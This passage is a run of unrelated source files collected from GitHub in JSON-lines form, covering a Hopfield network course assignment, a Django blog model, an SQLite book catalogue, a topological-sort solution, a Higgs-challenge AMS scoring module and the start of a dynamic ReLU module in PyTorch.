range(15):\n n = random.randint(0,1)\n random_pattern_3.append(n)\nlist_of_random_training_patterns = [random_pattern_1, random_pattern_2, random_pattern_3]\n\n#Train the network on those walsh functions:\nHop_network.train_patterns(random_pattern_1) \nHop_network.train_patterns(random_pattern_2)\nHop_network.train_patterns(random_pattern_3)\n\n#Part 2B\n#Run the network\nlist_0_runs = []\nlist_1_runs = []\nlist_2_runs = []\nlist_3_runs = []\nlist_4_runs = []\nlist_5_runs = []\n\nfor noise_level in (0,.1,.2,.3,.4,.5): \n for training_pattern in list_of_random_training_patterns:\n for run_index in range(5):\n start_pattern = Hop_network.make_starting_state(training_pattern, noise_level)\n #list_of_runs_output.append(Hop_network.run_network(start_pattern, training_pattern))\n if training_pattern == random_pattern_1:\n list_0_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif training_pattern == random_pattern_2:\n list_1_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n elif training_pattern == random_pattern_3:\n list_2_runs.append(Hop_network.run_network(start_pattern, training_pattern))\n \n\n#Get summary statistics\nlist_0_runs = pd.DataFrame(list_0_runs)\nlist_1_runs = pd.DataFrame(list_1_runs)\nlist_2_runs = pd.DataFrame(list_2_runs)\n\n#############\nlist_0_runs = list_0_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_1_runs = list_1_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_2_runs = list_2_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\n\npart_2b_summary_stats = [list_0_runs, list_1_runs, list_2_runs]\n\n#Print out the summary stats:\ncount = 0\nfor df in part_2b_summary_stats:\n print('* * * * * * * * * * * * * * * * * * * *')\n count += 1\n print('For random pattern', str(count), ':')\n print('Number of times network failed to settle: ', df.loc[df['# Iterations'] == 50, '# Iterations'].count())\n print(\"Average energy: \", df['Energy'].mean())\n print(\"Average hamming 
Distance: \", df['Hamming Distance'].mean())\n \n#How do the results differ from part 1?\n'''because the patterns have totally random noise, there is no systematic increase or \ndecrease in the different metrics of model performance'''\n\n#add more random starting patterns twice over:\nrandom_pattern_4 = []\nfor i in range(15):\n n = random.randint(0,1)\n random_pattern_4.append(n)\n \n#now test the network with this new pattern:\n\nrandom_pattern_4_ss = Hop_network.make_starting_state(training_pattern, .2)\nHop_network.train_patterns(random_pattern_4)\nHop_network.run_network(random_pattern_4_ss, random_pattern_4)\n \nrandom_pattern_5 = []\nfor i in range(15):\n n = random.randint(0,1)\n random_pattern_5.append(n)\n \n#now test the network with this new pattern:\nrandom_pattern_5_ss = Hop_network.make_starting_state(training_pattern, .2)\nHop_network.train_patterns(random_pattern_5)\nHop_network.run_network(random_pattern_5_ss, random_pattern_5)\n\n'''as you train more random patterns, the performance stays the same, more\nor less making noisy predictions about patterns that are randomly generated. \nThe energy also seems to increase, suggesting it falls into to some weird energy well.'''\n\n\n#################### Part 3 ###################\n####### Systematically Related Patterns #######\n###############################################\n\n#initialize network\nHop_network = network(16) \n\n#establish a base pattern and make noisy patterns based off it \nbase_pattern = [0,0,0,0,0,0,0,0,1,1,1,1,1,1,1,1]\npart3_tp1 = Hop_network.make_starting_state(base_pattern, .125)\npart3_tp2 = Hop_network.make_starting_state(base_pattern, .125)\npart3_tp3 = Hop_network.make_starting_state(base_pattern, .125)\npart3_tp4 = Hop_network.make_starting_state(base_pattern, .125)\npart3_tp5 = Hop_network.make_starting_state(base_pattern, .125)\npart3_tp6 = Hop_network.make_starting_state(base_pattern, .125)\n\nsystem_related_patterns = [part3_tp1, part3_tp2 ,part3_tp3,\n part3_tp4, part3_tp5 , part3_tp6]\n\n#Train the network on the noisy patterns we made, but NOT base pattern:\nHop_network.train_patterns(part3_tp1) \nHop_network.train_patterns(part3_tp2)\nHop_network.train_patterns(part3_tp3) \nHop_network.train_patterns(part3_tp4) \nHop_network.train_patterns(part3_tp5) \nHop_network.train_patterns(part3_tp6) \n\n\n\n#Now run the network using the nosiy start patterns with no change\n\npart_3_output = []\npart_3_output.append(Hop_network.run_network(part3_tp1, base_pattern))\npart_3_output.append(Hop_network.run_network(part3_tp2, base_pattern))\npart_3_output.append(Hop_network.run_network(part3_tp3, base_pattern))\npart_3_output.append(Hop_network.run_network(part3_tp4, base_pattern))\npart_3_output.append(Hop_network.run_network(part3_tp5, base_pattern))\npart_3_output.append(Hop_network.run_network(part3_tp6, base_pattern))\n\n\n#Get summary statistics\npart_3_output = pd.DataFrame(part_3_output)\n#############\npart_3_output = part_3_output.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\n\n#Print out the summary stats:\nprint('* * * * * * * * * * * * * * * * * * * *')\nprint('Number of times network failed to settle: ', part_3_output.loc[df['# Iterations'] == 50, '# Iterations'].count())\nprint(\"Average energy: \", part_3_output['Energy'].mean())\nprint(\"Average hamming Distance: \", part_3_output['Hamming Distance'].mean())\n \n\n\n'''the network usually gets pretty close to rebuilding the base pattern, even\nthough it had never been shown it before. 
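Note that the loops above build 15-element patterns with range(15) even though the network was initialized with 16 units; a one-line sketch that keeps the pattern length tied to the unit count, assuming each unit is set independently with probability 0.5:

```python
import random

N_UNITS = 16   # matches network(16) above; the loops above use range(15)
random_pattern = [random.randint(0, 1) for _ in range(N_UNITS)]
print(len(random_pattern), random_pattern)
```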
Hamming distances in the few times I tried running it\nwere either 0s or 1s. I'm really not sure what psychological \nphenomenon it might correspond to, but perhaps some sort of noise reduction? It can \nreconstruct a pattern it hadn't seen from many different instances of roughly that \nwith noise. Perhaps it might be some sort of associative memory retrieval?\n'''\n\n########## Part 4 ###########\n####### Sync updating #######\n#############################\n\nHop_network = network(16) \n\n\nHop_network.train_patterns(training_pattern_1) \nHop_network.train_patterns(training_pattern_2)\nHop_network.train_patterns(training_pattern_3)\nHop_network.train_patterns(training_pattern_4)\n\n\n#Run the network with asyncronous updating\nlist_0_runs = []\nlist_1_runs = []\nlist_2_runs = []\nlist_3_runs = []\nlist_4_runs = []\nlist_5_runs = []\nfor training_pattern in list_of_training_patterns:\n for noise_level in (0,.1,.2,.3,.4,.5): \n for run_index in range(5):\n start_pattern = Hop_network.make_starting_state(training_pattern, noise_level)\n \n if noise_level == 0:\n list_0_runs.append(Hop_network.run_network(start_pattern, training_pattern, sync_update=True))\n elif noise_level == .1:\n list_1_runs.append(Hop_network.run_network(start_pattern, training_pattern, sync_update=True))\n elif noise_level == .2:\n list_2_runs.append(Hop_network.run_network(start_pattern, training_pattern, sync_update=True))\n elif noise_level == .3:\n list_3_runs.append(Hop_network.run_network(start_pattern, training_pattern, sync_update=True))\n elif noise_level == .4:\n list_4_runs.append(Hop_network.run_network(start_pattern, training_pattern, sync_update=True))\n elif noise_level == .5:\n list_5_runs.append(Hop_network.run_network(start_pattern, training_pattern, sync_update=True))\n \n#Get summary statistics\nlist_0_runs = pd.DataFrame(list_0_runs)\nlist_1_runs = pd.DataFrame(list_1_runs)\nlist_2_runs = pd.DataFrame(list_2_runs)\nlist_3_runs = pd.DataFrame(list_3_runs)\nlist_4_runs = pd.DataFrame(list_4_runs)\nlist_5_runs = pd.DataFrame(list_5_runs)\n#############\nlist_0_runs = list_0_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_1_runs = list_1_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_2_runs = list_2_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_3_runs = list_3_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_4_runs = list_4_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\nlist_5_runs = list_5_runs.rename(columns = {0: 'Hamming Distance', 1: \"Energy\", 2: \"# Iterations\"})\n\npart_4_summary_stats = [list_0_runs, list_1_runs, list_2_runs, \n list_3_runs ,list_4_runs, list_5_runs]\n\n#Print out the summary stats:\ncount = 0\nfor df in part_4_summary_stats:\n print('* * * * * * * * * * * * * * * * * * * *')\n print('For noise value', str(count), ':')\n print('Number of times network failed to settle: ', df.loc[df['# Iterations'] == 50, '# Iterations'].count())\n print(\"Average energy: \", df['Energy'].mean())\n print(\"Average hamming Distance: \", df['Hamming Distance'].mean())\n count += .1\n\n","repo_name":"coreyjr2/PSYC-489---Neural-Net-Modeling","sub_path":"Psych 489 assignment 3.py","file_name":"Psych 489 assignment 3.py","file_ext":"py","file_size_in_byte":24075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"28692927925","text":"from 
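train_patterns itself is defined earlier in that file and not shown here, but the classic Hopfield prescription it presumably follows is a Hebbian outer product over +/-1-coded patterns with the diagonal zeroed; a standalone sketch of that standard rule (the class's own implementation may differ in details):

```python
import numpy as np

def hebbian_weights(patterns, n_units):
    # Standard Hopfield learning: sum outer products of +/-1 patterns.
    W = np.zeros((n_units, n_units))
    for p in patterns:
        v = 2 * np.asarray(p) - 1    # map {0, 1} -> {-1, +1}
        W += np.outer(v, v)
    np.fill_diagonal(W, 0)           # no self-connections
    return W

print(hebbian_weights([[1, 1, 0, 0], [1, 0, 1, 0]], 4))
```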
__future__ import annotations\nimport typing\n\nfrom django.conf import settings\nfrom django.db import models\nfrom django import forms\nfrom django.core.handlers.wsgi import WSGIRequest\nfrom rest_framework.request import Request\nfrom tinymce.models import HTMLField\n\nfrom sapp.models import SM, AbstractUser, ImageField\n\n\nclass Category(SM):\n icon = \"fas fa-ad\"\n list_field_names = (\"id\", \"name\", \"image\")\n serializer_list_field_names = list_field_names + (\"header\", )\n detail_field_names = (\"id\", \"name\", \"image\", \"header\") + SM.sm_meta_field_names\n api_methods = (\"get_category_post_stats_api\", \"get_category_author_stats_api\")\n queryset_names = (\"posts\",)\n\n class Meta(SM.Meta):\n verbose_name_plural = \"Categories\"\n\n name = models.CharField(max_length=256)\n image = ImageField(upload_to=\"blog_posts\")\n header = models.TextField(blank=True, null=True, max_length=256)\n\n @property\n def posts(self):\n return Post.objects.filter(category = self)\n \n @classmethod\n def get_category_post_stats_api(cls, request: Request, kwds: dict):\n return cls.get_category_post_stats()\n\n @classmethod\n def get_category_post_stats(cls):\n data = {}\n for i in Category.objects.all():\n data[f\"{i.name}\"] = Post.objects.filter(category_id=i.pk).count()\n return data\n \n @classmethod\n def get_category_author_stats_api(cls, request: Request, kwds: dict):\n return cls.get_category_author_stats()\n\n @classmethod\n def get_category_author_stats(cls):\n data = {}\n for i in Category.objects.all():\n data[f\"{i.name}\"] = Author.objects.filter(categories__in=[i]).count()\n return data\n \n def __str__(self):\n return self.name\n\n\nclass Author(SM):\n icon = \"fas fa-user-tie\"\n list_field_names = (\"id\", \"user\", \"image\", \"full_name\")\n queryset_names = (\"posts\", )\n api_methods = (\"get_author_ctx_api\", )\n\n user: models.OneToOneField[AbstractUser] = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.SET_NULL, blank=True, null=True)\n full_name = models.CharField(max_length=256)\n image = ImageField(upload_to=\"blog_authors\", blank=True, null=True)\n about = HTMLField()\n categories = models.ManyToManyField(Category, blank=True)\n\n def __str__(self):\n return self.full_name\n\n @property\n def posts(self):\n return Post.objects.filter(author = self)\n \n @classmethod\n def get_author_ctx_api(cls, request: Request, kwds: dict):\n author = Author.objects.filter(user=request.user).first()\n if not author:\n return None\n serializer_class = cls.get_serializer(request, (\"id\", \"full_name\", \"user\", \"image\", \"about\", \"categories\"))\n return serializer_class(instance=author).data\n\n\nclass Post(SM):\n icon = \"fas fa-blog\"\n list_field_names = (\"id\", \"title\", \"image\", \"category\", \"author\", \"published\", \"reads\", \"creation_timestamp\")\n serializer_list_field_names = list_field_names + (\"serialized_author\", \"serialized_category\")\n detail_field_names = list_field_names + (\"body\", \"keywords\") + SM.sm_meta_field_names\n serializer_detail_field_names = tuple(set(serializer_list_field_names+ detail_field_names))\n filter_field_names = (\"author\", \"published\", \"category\", \"created_by\")\n queryset_names = (\"comments\",)\n \n has_attachments = True\n has_reactions = True\n confirm_delete = True\n has_bookmarks = True\n\n title = models.CharField(max_length=256)\n image = ImageField(upload_to=\"blog_posts\")\n body = HTMLField()\n author = models.ForeignKey(Author, on_delete=models.SET_NULL, blank=True, null=True)\n 
published = models.BooleanField(default=False)\n category = models.ForeignKey(Category, on_delete=models.PROTECT)\n keywords = models.CharField(max_length=256, blank=True, null=True)\n reads = models.PositiveIntegerField(default=0, blank=True)\n\n @property\n def comments(self):\n return Comment.objects.filter(post_id=self.pk)\n \n @property\n def serialized_author(self):\n return self.author.values_dict(\"id\", \"full_name\") if self.author else None\n \n @property\n def serialized_category(self):\n return self.category.values_dict(\"id\", \"name\")\n\n def set_published(self):\n if not self.updated_by.has_perm(\"blog.publish_post\"):\n self.published = False\n \n def set_author(self):\n if not self.author:\n self.author = self.created_by\n\n def save(self, *args, **kwargs):\n self.set_published()\n return super().save(*args, **kwargs)\n \n def __str__(self):\n return self.title\n\n @classmethod\n def get_filters_form(cls, request: WSGIRequest, _fields: typing.Iterable=None):\n super_form = super().get_filters_form(request, _fields)\n class FilterForm(super_form):\n title__icontains = forms.CharField(label=\"Title\")\n keywords__icontains = forms.CharField(label=\"Keywords\")\n body__icontains = forms.CharField(label=\"Body\")\n id__in = forms.MultipleChoiceField(label=\"ID In\", choices=cls.objects.values_list(\"id\", \"id\"))\n return FilterForm\n\n\nclass Comment(SM):\n class Meta(SM.Meta):\n ordering = (\"-id\", )\n icon = \"fas fa-comment-dots\"\n list_field_names = (\"id\", \"post\", \"text\", \"created_by\", \"username\", \"creation_timestamp\")\n filter_field_names = (\"post\",)\n\n text = models.TextField(max_length=512)\n post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name=\"post_comments\")\n comment = models.ForeignKey(\"self\", on_delete=models.CASCADE, related_name=\"comment_comments\", blank=True, null=True)\n username = models.CharField(max_length=256, blank=True)\n\n @property\n def replies(self):\n return Comment.objects.filter(comment__id=self.id)\n \n @property\n def list_url(self):\n return self.post.detail_url\n \n def set_username(self):\n self.username = str(self.updated_by or self.created_by)\n \n def save(self, *args, **kwargs):\n self.set_username()\n return super().save(*args, **kwargs)\n\n\nclass Following(SM):\n class Meta(SM.Meta):\n unique_together = (\"follower\", \"author\")\n \n icon = \"fas fa-grin-hearts\"\n\n follower = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n author = models.ForeignKey(Author, on_delete=models.CASCADE)\n \n def __str__(self):\n return f\"{self.follower} follows {self.author}\"","repo_name":"mikietechie/sapp_blog","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5850967773","text":"import sqlite3\r\n\r\n\r\ndef connect():\r\n conn = sqlite3.connect('data.db')\r\n cur = conn.cursor()\r\n cur.execute(\r\n 'CREATE TABLE IF NOT EXISTS book(id INTEGER PRIMARY KEY, title TEXT, author TEXT, year INTEGER, isbn INTEGER, description TEXT)')\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef add_data(title, author, year, isbn, description):\r\n conn = sqlite3.connect('data.db')\r\n cur = conn.cursor()\r\n cur.execute('INSERT INTO book VALUES(NULL,?,?,?,?,?)', (title, author, year, isbn, description))\r\n # system will auto-increment id of books thus, we pass NULL parameter\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef view():\r\n conn = 
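set_published in the model above silently clears the flag whenever the editing user lacks the blog.publish_post permission. The gate is easiest to see in isolation; has_perm is the real Django user API, while FakeUser below is just a test double for the sketch:

```python
class FakeUser:
    def __init__(self, perms):
        self.perms = set(perms)

    def has_perm(self, perm):   # mirrors django.contrib.auth's User.has_perm
        return perm in self.perms

def gate_publish(requested, user):
    # Only users holding blog.publish_post may leave published=True.
    return requested and user.has_perm("blog.publish_post")

print(gate_publish(True, FakeUser({"blog.publish_post"})))   # True
print(gate_publish(True, FakeUser(set())))                   # False
```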
sqlite3.connect('data.db')\r\n cur = conn.cursor()\r\n cur.execute('SELECT * FROM book')\r\n rows = cur.fetchall() # fetches all rows from query result to get a list of rows\r\n conn.close()\r\n # since we don't have to commit changes for viewing, we directly close the connection instead of conn.commit()\r\n return rows\r\n\r\n\r\ndef search(title='', author='', year='', isbn=''):\r\n conn = sqlite3.connect('data.db')\r\n cur = conn.cursor()\r\n cur.execute('SELECT * FROM book WHERE title=? OR author=? OR year=? OR isbn=?', (title, author, year, isbn))\r\n rows = cur.fetchall()\r\n conn.close()\r\n return rows\r\n\r\n\r\ndef delete(id):\r\n conn = sqlite3.connect('data.db')\r\n cur = conn.cursor()\r\n # since there is only one parameter thus, we add a comma(,) after the parameter\r\n cur.execute('DELETE FROM book WHERE id=?', (id,))\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef update(id, title, author, year, isbn, description):\r\n conn = sqlite3.connect('data.db')\r\n cur = conn.cursor()\r\n cur.execute('UPDATE book SET title=?, author=?, year=?, isbn=?, description =? WHERE id =?',\r\n (title, author, year, isbn, description, id))\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\nconnect()\r\nadd_data('Guiding Souls - Dialogues on the Purpose of Life', 'Arun Tiwari, A. P. J. Abdul Kalam', 2005, 9788188322749, \"It deals with the concept of inner experience – thoughts, emotions, feelings, perception, and knowledge among their things.\")\r\nadd_data('Train To Pakistan', 'Khushwant Singh', 1956, 9780143065882, \"It recounts the Partition of India in August 1947 through the perspective of Mano Majra, a fictional border village.\")\r\nadd_data('Trainspotting', 'Irvine Welsh', 1993, 9780749336509, \"The best kind of comedy is based on recognition, and those of us who had grown up in Scotland during the 1980s fell off our barstools reading Irvine Welsh's Trainspotting. The novel has a surreal kind of authenticity, which might sound like a contradiction until you remember what the times were like: times when a feeling of dispossession gave way to a blessed sense of hedonism. All the characters in the book feel totally committed to their own world view in a way that is hilarious and deeply true.\")\r\nadd_data('The Haunting of Hill House', 'Shirley Jackson', 1959, 9780141191449, \"description: The author decided to write 'a ghost story' after reading about a group of nineteenth-century 'psychic researchers' who studied a house and somberly reported their supposedly scientific findings to the Society for Psychic Research.\")\r\nadd_data('Three Men In A Boat', 'K Jerome', 1889, 9788172344436, \"Three wealthy layabouts take a boat trip up the Thames to the amusement of generations of readers. The book was originally intended to be a serious travel guide but, thankfully, it succumbed to the wit of the narrator's anecdotes and remains a warming portrayal of a brilliantly welcoming writer's mind.\")\r\n\r\n# delete(2)\r\n# update(5, 'Three Men In A Boat', 'John Leo', 1889, 9788172344436,\"Three wealthy layabouts take a boat trip up the Thames to the amusement of generations of readers. 
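Every helper in this module repeats the connect/commit/close dance. sqlite3 connections are context managers that commit on success and roll back on error (they still need an explicit close, which contextlib.closing supplies), so the boilerplate can shrink; a sketch of add_data in that style, assuming the book table created by connect() exists:

```python
import sqlite3
from contextlib import closing

def add_data(title, author, year, isbn, description, db='data.db'):
    # Outer closing() releases the connection; the inner conn context
    # commits on clean exit and rolls back on an exception.
    with closing(sqlite3.connect(db)) as conn, conn:
        conn.execute('INSERT INTO book VALUES(NULL,?,?,?,?,?)',
                     (title, author, year, isbn, description))
```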
The book was originally intended to be a serious travel guide but, thankfully, it succumbed to the wit of the narrator's anecdotes and remains a warming portrayal of a brilliantly welcoming writer's mind.\")\r\n# print(view())\r\n# print(search(author='Shirley Jackson'))\r\n","repo_name":"bhagyashreeshirkar/Digital-Book-Catalogue","sub_path":"backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":4046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"28064554607","text":"import heapq\r\n\r\nn, m = map(int, input().split())\r\n\r\n# 위상정렬 그래프\r\ngraph = [[] for _ in range(n + 1)] # 1-based\r\n# 진입 차수 리스트\r\nindegree = [0 for _ in range(n + 1)]\r\n# 우선순위 큐\r\nque = []\r\n\r\n# 선수문제\r\nfor _ in range(m):\r\n first, last = map(int, input().split())\r\n graph[first].append(last)\r\n indegree[last] += 1 # 진입차수 + 1 해준다\r\n\r\n\r\n# 위상정렬\r\ndef topology_sort():\r\n # 정답 담을 리스트\r\n res = []\r\n # 1. 진입 차수가 0인 노드부터 큐에 삽입\r\n for i in range(1, n + 1):\r\n if indegree[i] == 0:\r\n heapq.heappush(que, i)\r\n # 2. 큐가 빌때까지 반복\r\n while que:\r\n # 큐에서 원소 꺼내기\r\n now = heapq.heappop(que) # 오름차순 정렬 후 추출\r\n res.append(now)\r\n # 2-1. 해당 원소와 연결된 노드들의 진입차수에서 1을 뺀다.\r\n for j in graph[now]:\r\n indegree[j] -= 1\r\n # 2-2. 새롭게 진입차수가 0이 되는 노드를 큐에 삽입\r\n if indegree[j] == 0:\r\n heapq.heappush(que, j)\r\n # 위상정렬 수행한 정답 출력\r\n for r in res:\r\n print(r, end=' ')\r\n\r\n\r\ntopology_sort()\r\n","repo_name":"allzeroyou/Algorithm","sub_path":"백준/Gold/1766. 문제집/문제집.py","file_name":"문제집.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"11577364372","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Mar 5 01:57:08 2016\n\n@author: vr308\n\"\"\"\nimport numpy as np\nimport matplotlib.pylab as plt\nfrom scipy.stats.stats import nanmean\nimport tree_model\n\ndef ams_score(model,X_train,X_test,Y_train,Y_test,W_train,W_test,cut,probability_model): \n \n if probability_model == 1:\n prob_train_score = tree_model.model_probability(model, X_train,Y_train) \n prob_test_score = tree_model.model_probability(model, X_test,Y_test)\n else :\n prob_train_score = tree_model.calibrate_probability(model, X_train,Y_train) \n prob_test_score = tree_model.calibrate_probability(model, X_test,Y_test)\n \n # A lot of successful models have shows that the AMS is maximized at threshold of 85%\n \n pcut = np.percentile(prob_train_score,cut)\n \n # The selection region \n \n Yhat_train = prob_train_score >= pcut \n Yhat_test = prob_test_score >= pcut\n \n # Unbiased estimator of expected signal and background events obtained \n # by summing the unnormalized importance weights over each class in the \n \n N_s = 691.98 # Unbiased estimator of number of signal events obtained from full dataset\n N_b = 410999.84 # Unbiased estimator of number of background events obtained from full dataset\n \n sum_of_weights_signal_train_set = sum(W_train*(np.asarray(Y_train)==1.0))\n sum_of_weights_background_train_set = sum(W_train*(np.asarray(Y_train)==0.0))\n sum_of_weights_signal_test_set = sum(W_test*(np.asarray(Y_test)==1.0))\n sum_of_weights_background_test_set = sum(W_test*(np.asarray(Y_test)==0.0))\n\n # To calculate the AMS, first get the true \n # Scale the weights according to fraction of training data used\n\n TruePositive_train = W_train*(np.asarray(Y_train)==1.0)*(N_s/sum_of_weights_signal_train_set)\n FalsePositive_train = 
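The topology_sort in the record above is Kahn's algorithm with a min-heap in place of a FIFO queue, so ties always resolve to the smallest problem number. A self-contained run on a four-node toy graph shows the effect:

```python
import heapq

def kahn_min(n, edges):
    graph = [[] for _ in range(n + 1)]   # 1-based, as above
    indeg = [0] * (n + 1)
    for a, b in edges:                   # a must be solved before b
        graph[a].append(b)
        indeg[b] += 1
    heap = [v for v in range(1, n + 1) if indeg[v] == 0]
    heapq.heapify(heap)
    order = []
    while heap:
        v = heapq.heappop(heap)          # smallest available node first
        order.append(v)
        for w in graph[v]:
            indeg[w] -= 1
            if indeg[w] == 0:
                heapq.heappush(heap, w)
    return order

print(kahn_min(4, [(4, 2), (3, 1)]))     # [3, 1, 4, 2]
```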
W_train*(np.asarray(Y_train)==0.0)*(N_b/sum_of_weights_background_train_set)\n TruePositive_test = W_test*(np.asarray(Y_test)==1.0)*(N_s/sum_of_weights_signal_test_set)\n FalsePositive_test = W_test*(np.asarray(Y_test)==0.0)*(N_b/sum_of_weights_background_test_set)\n \n s_train = sum ( TruePositive_train*(Yhat_train==1.0) ) \n b_train = sum ( FalsePositive_train*(Yhat_train==1.0) )\n s_test = sum ( TruePositive_test*(Yhat_test==1.0) )\n b_test = sum ( FalsePositive_test*(Yhat_test==1.0) ) \n \n ams_train = ams_compute(b_train,s_train)\n ams_test = ams_compute(b_test,s_test)\n \n return ams_train, ams_test\n\n\ndef ams_compute(b,s):\n \n return np.math.sqrt (2.*( (s + b)*np.math.log(1.+s/b)-s))\n \n\ndef average_ams(model,X_train,X_test, Y_train,Y_test, W_train,W_test,cuts,prob,bm):\n \n ams_train_list = []\n ams_test_list = []\n for i in cuts:\n ams_train, ams_test = ams_score(model,X_train,X_test,Y_train,Y_test,W_train,W_test,i,prob,bm)\n ams_train_list.append(ams_train)\n ams_test_list.append(ams_test)\n return nanmean(ams_train_list), nanmean(ams_test_list)\n\ndef ams_curve(model,X_train,X_test,Y_train,Y_test,W_train,W_test,thresh,prob):\n \n ams_train_curve = []\n ams_test_curve = []\n for i in thresh:\n ams_train, ams_test = ams_score(model,X_train,X_test,Y_train,Y_test,W_train,W_test,i,prob)\n ams_train_curve.append(ams_train)\n ams_test_curve.append(ams_test)\n return ams_train_curve,ams_test_curve\n\n \ndef plot_ams_curve(cuts,ams_curve,label):\n \n peak_ams = max(ams_curve)\n best_cut = cuts[ams_curve.index(max(ams_curve))]\n plt.figure()\n plt.grid()\n plt.xlim(min(cuts),max(cuts))\n plt.plot(cuts,ams_curve,'r+-',label='Test AMS')\n plt.axhline(y=peak_ams,label='Peak AMS = '+str(round(peak_ams,2)),color='black',linestyle='--')\n plt.axvline(x=best_cut,linestyle='--',label = 'Best threshold = ' + str(best_cut),color='black')\n plt.xlabel('Threshold (% Rejected)')\n plt.ylabel('AMS Score')\n plt.legend(loc=2)\n plt.title('AMS Curve ' + label) \n \n \n \n#def ams_score(model,X_train,X_test,Y_train,Y_test,W_train,W_test,cut,prob,bm): \n# \n# if prob == 1:\n# prob_train_score = tree_model.model_probability(model, X_train,Y_train) \n# prob_test_score = tree_model.model_probability(model, X_test,Y_test)\n# else :\n# prob_train_score = tree_model.calibrate_probability(model, X_train,Y_train,bm) \n# prob_test_score = tree_model.calibrate_probability(model, X_test,Y_test,bm)\n# \n# \n# # Experience shows me that choosing the top 15% as signal gives a good AMS score.\n# pcut = np.percentile(prob_train_score,cut)\n# \n# # This are the final signal and background predictions\n# \n# Yhat_train = prob_train_score > pcut \n# Yhat_test = prob_test_score > pcut\n# \n# train_frac = len(Y_train)/250000.0\n# test_frac = len(Y_test)/250000.0\n# \n# # To calculate the AMS data, first get the true positives and true negatives\n# # Scale the weights according to fraction\n# \n# TruePositive_train = W_train*(np.asarray(Y_train)==1.0)*(1.0/train_frac)\n# TrueNegative_train = W_train*(np.asarray(Y_train)==0.0)*(1.0/train_frac)\n# TruePositive_valid = W_test*(np.asarray(Y_test)==1.0)*(1.0/test_frac)\n# TrueNegative_valid = W_test*(np.asarray(Y_test)==0.0)*(1.0/test_frac)\n# \n# # Counting the number of signals and background \n# \n# s_train = sum ( TruePositive_train*(Yhat_train==1.0) )\n# b_train = sum ( TrueNegative_train*(Yhat_train==1.0) )\n# s_test = sum ( TruePositive_valid*(Yhat_test==1.0) )\n# b_test = sum ( TrueNegative_valid*(Yhat_test==1.0) ) \n# \n# AMS_Train = ams_compute(b_train,s_train)\n# 
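The quantity being assembled here is the approximate median significance, AMS = sqrt(2((s + b) ln(1 + s/b) - s)); for s much smaller than b it reduces to the familiar s/sqrt(b), which a quick numeric check confirms:

```python
import math

def ams(s, b):
    return math.sqrt(2 * ((s + b) * math.log(1 + s / b) - s))

print(ams(10.0, 10000.0))           # ~0.09998
print(10.0 / math.sqrt(10000.0))    # 0.1, the s/sqrt(b) approximation
```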
AMS_Test = ams_compute(b_test,s_test)\n# \n# #print AMS_Train\n# #print AMS_Test \n# \n# return AMS_Train, AMS_Test","repo_name":"vr308/HiggsProject","sub_path":"HiggsDT-master/discovery_significance.py","file_name":"discovery_significance.py","file_ext":"py","file_size_in_byte":5761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"26561778165","text":"import torch\nimport torch.nn as nn\n'''\n动态ReLU\nhttps://github.com/Islanna/DynamicReLU\n'''\nclass DyReLU(nn.Module):\n '''\n reduction=8 是性能和计算量权衡的选择。 4较比8提升较弱\n k=2 激活函数中分段函数的个数,常规均为2\n '''\n def __init__(self, channels, reduction=4, k=2, conv_type='2d'):\n super(DyReLU, self).__init__()\n self.channels = channels\n self.k = k\n self.conv_type = conv_type\n assert self.conv_type in ['1d', '2d']\n\n # 类似SE模块,降维再升维 为ab系数生成对应的残差\n self.fc1 = nn.Linear(channels, channels // reduction)\n self.relu = nn.ReLU(inplace=True)\n self.fc2 = nn.Linear(channels // reduction, 2*k)\n self.sigmoid = nn.Sigmoid()\n\n # register_buffer将tensor注册成buffer,其参数 不进行更新\n # ab值= 初始值 + λ*残差值\n self.register_buffer('lambdas', torch.Tensor([1.]*k + [0.5]*k).float()) # λ控制 残差范围\n self.register_buffer('init_v', torch.Tensor([1.] + [0.]*(2*k - 1)).float()) # a\\b系数初始值 a1=1,a2=b1=b2=0,即ReLU.\n def get_relu_coefs(self, x):\n # '2d'时 为GAP全局平均池化 [2,64,112,112] -> [2,64]\n theta = torch.mean(x, axis=-1)\n if self.conv_type == '2d':\n theta = torch.mean(theta, axis=-1)\n # [2,64]-> [2,16] 因为R=4\n theta = self.fc1(theta) # 降维\n theta = self.relu(theta)\n theta = self.fc2(theta) # 升维,得到a、b系数对应的残差\n theta = 2 * self.sigmoid(theta) - 1 # 规范化到-1~1之间\n return theta\n\n def forward(self, x):\n raise NotImplementedError\n\n\nclass DyReLUA(DyReLU):\n def __init__(self, channels, reduction=4, k=2, conv_type='2d'):\n super(DyReLUA, self).__init__(channels, 